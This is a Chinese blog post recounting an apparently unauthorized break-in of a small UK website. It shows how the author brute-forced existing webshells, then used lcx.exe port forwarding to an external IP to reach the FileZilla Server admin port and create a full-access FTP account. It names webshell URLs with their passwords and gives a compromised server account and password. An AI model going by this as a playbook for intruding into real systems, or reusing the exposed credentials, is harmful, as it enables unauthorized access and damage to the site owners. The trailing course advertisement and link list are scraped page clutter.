当前位置: 首页 > news >正文

记一次用黑客技术后门爆破网站到提权的实战案例,黑客技术零基础入门教程建议收藏!

前言

这次的目标是一个英国小网站,目的是拿下这个站点指定文件的修改权限。习惯性的在渗透某个目标之前先对目标进行基本的信息搜集,这样在后面的渗透过程中可以省下不少时间,此次的渗透可以说80%的运气,20%的经验才顺利拿到目标权限。

基本信息探测:

  • 目标站点:http://www.wem****.co.uk

  • 服务器IP:9*.1*9.1*4.*2(英国)

  • 环境平台:ASP.NET

  • 服务器系统:Microsoft-IIS/7.5

PORT STATE SERVICE VERSION21/tcpopenftpFileZilla ftpd0.9.41 beta80/tcpopenhttp Microsoft HTTPAPI httpd2.0(SSDP/UPnP)

Getshell过程

这里就简化写了,先在主站仔细找找上传、注入、Fckeditor和敏感文件、目录,结果都没找到,主站基本没戏了,接着拿御剑对目标站的旁站进行扫描,后来去忙其他事了,放着在扫,事情忙完后还看了部电影,准备关电脑睡觉的时候才发现御剑还在扫着的呢,都快给忘了。

打开御剑把扫描到的链接导出来,用了半小时检测,虽然发现了一些上传、注入,Fckeditor啥的,但感觉这些漏洞好像都被别人修复过了,接着往下看,找到了几个敏感文件名,打开看既然是一个大马和一句话木马,通过弱口令和爆破方式成功得到密码。

弱口令测试: http://www.berkshire--workshops.co.uk/test.aspx Pass:admin 一句话爆破: http://www.sonnergy*shade.co.uk/css.asp Pass:110

爆破字典:https://github.com/3had0w/Fuzzing-Dicts

注:成功拿到这个目标网站的Webshell权限可以说运气成份很大,但也需要一定的细心、耐心和经验,这几点在做渗透测试时也是非常重要的。

实战提权过程

由于这次目的是拿下这个目标站点指定文件的修改权限,所以我们得先去看看能不能直接跨到目标站点路径,如果不能直接跨过去或者是没有修改权限时再去想其它办法进行提权。

  1. 经过测试发现可直接跨到目标站,并且具备上传、新建和删除文件权限,但就是没有修改权限;

  2. 2008的提权EXP不多,尝试了各种已知提权EXP均以失败告终,可以再去试一下MSF的提权模块;

  3. 找第三方软件提权,前期的信息探测中已知系统运行着FileZilla ftpd 0.9.41 beta软件,找找看有没有安装的有FileZilla Server服务端;

注:可以用netstat -ano、tasklist命令来查看目标机器中是否安装的有可用于提权的第三方软件,如:Radmin、Gene6FTP、FileZilla Server等。

Filezilla Serve这个软件在国外服务器用的还是挺多的,21端口是客户端连接时需要的,14147端口则是服务端运行时需要的。我们的提权方法就是利用端口转发方式直接登录到目标机器的Filezilla Server服务端,然后创建一个拥有全盘目录权限的FTP账户。

(1) 使用netstat -ano、tasklist命令确认目标服务器是否运行了Filezilla Server软件,是不是用默认的14147端口,或者是修改为其它端口了,如下图。

(2) Filezilla Server服务端一般都会默认安装在C、D盘下的\Program Files\文件夹中,这里我已经提前找到了,安装目录下有2个重要的XML配置文件。

用来保存管理员用户信息: C:\Program Files\FileZilla Server\FileZillaServer Interface.xml 用来保存普通FTP用户信息: C:\Program Files\FileZilla Server\FileZilla Server.xml

(3) 本地执行:lcx.exe -listen 51 14147,首先本机监听51端口,连接用14147端口。

(4) Webshell上执行:lcx.exe -slave 外网IP 51 127.0.0.1 14147

(5) 本地运行打包下来的Filezilla Server,打开后会自动读取配置文件里的账户密码进行连接。

注:如果出现连接不上的情况,这可能是因为我们本地的Filezilla Server与目标的Filezilla Server版本不一致,为了避免这个问题,可以直接将服务器上的Filezilla Server整个文件夹打包下来运行。

(6) Filezilla Server上创建一个拥有C、D盘权限账户,将读取/写入/创建/删除权限都给勾选上。

(7) 这里给的D盘权限是因为目标网站都放在D盘,只要达到能修改指定文件目的就行,大家在实际测试过程中可以选择添加C盘权限,然后再进行下一步的提权操作

这里目的已经达到,指定文件已经有了修改权限,所以就暂时没再继续提服务器了,FTP权限已经足够用了!隔了几天后用MS12-042提权EXP成功拿到服务器权限,帐号:luoye,密码:456$love。

思考总结

(1) 服务器外网,配置文件有修改权限,直接修改FileZilla Server.xml配置文件,这种情况应该比较少见,就不再详细写了。

(2) 服务器外网,配置文件只读权限,通过端口转发工具将端口转发出来,如果服务器不在内网,随便一款端口转发都可以。

(3) 服务器内网,配置文件只读权限,利用lcx.exe将内网端口转发出来,与2的方法是一样的,只不过一个内网,一个外网。

  • 外网服务器:用端口转发功能突破配置文件只读限制;

  • 内网服务器:用端口转发功能突破内网连接及配置文件只读限制;

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取


http://www.jsqmd.com/news/200046/

相关文章:

  • ComfyUI发布新版支持GLM-4.6V-Flash-WEB拖拽式部署
  • 从零开始部署GLM-4.6V-Flash-WEB:Jupyter一键运行脚本实操记录
  • ComfyUI工作流设计:GLM-4.6V-Flash-WEB与其他模型串联推理
  • AI智能体Sweekar:90年代电子宠物的现代继承者
  • 2026年辅助教学机器人选购指南:从K12到高校实训的优选方案 - 智造出海
  • 必知!AI 大模型应用架构图(全)
  • 2025定制石墨烯涂料热销榜:环氧玻璃钢、无溶剂环氧涂料、光固化保护套、环氧酚醛、石墨烯涂料批发选哪家 - 品牌推荐师
  • 实例控制台日志轮转防止GLM-4.6V-Flash-WEB日志过大
  • 2026年选择印度名义雇主EOR服务商:Safeguard Global服务商综合评估 - 品牌2025
  • AI智能体居然能自己写代码?传统瑟瑟发抖,大模型开发者必学新技能
  • AI智能体革命:从钢铁侠J.A.R.V.I.S到现实编程助手,小白程序员必学的未来技术!
  • 2026年知名的北京老人陪诊,北京情感关怀陪诊,北京一站式陪诊公司采购选型指南 - 品牌鉴赏师
  • 英语_阅读_Lithium batteries_待读
  • 【爆肝整理】2024年最火的4大AI智能体框架,小白也能轻松上手!
  • 从工具到团队:万智2.5多智能体正在改写企业决策与执行全链路
  • 基于Springboot2+Vue2+uniapp的单商家在线点餐外卖小程序 - 教程
  • 2026年评价高的垂直领域医生IP打造,民营医院医生IP打造,医生IP打造公司采购参考指南 - 品牌鉴赏师
  • 基于微信小程序的高校班务管理系统毕设源码+文档+讲解视频
  • Dify access_token配置最佳实践(资深架构师亲授配置秘诀)
  • 小白也能上手!阿里云工程师一年踩坑全记录:从概念争议到高可用Agent智能体构建实战
  • 实用指南:力扣1083-销售分析II
  • 20260105_165948_Agent综述论文火了,10大技术路径一文看尽
  • 【AI真香】别再卷了!这个Agent让小白秒变大神,代码、PPT、UI设计全包圆!真香警告!
  • 【Dify多模态数据处理核心技术】:掌握高效格式转换的5大黄金法则
  • 不用写服务器代码?XinServer 真能做到吗?
  • 【毕业设计】python基于CNN卷积神经网络对辣椒类别识别
  • 小白必看!2024最全AI Agent框架大比拼:Dify/Coze/LangChain六王争霸,零代码到全栈开发一条龙指南[特殊字符]
  • FastStone Capture注册码破解违法?转向合规AI工具GLM-4.6V-Flash-WEB
  • 快速办理欧盟国际商标注册申请:TOP5代办公司机构效率与成功保障揭秘 - 速递信息
  • 杭州代理记账服务流程哪家公司专业?选择参考 - 品牌排行榜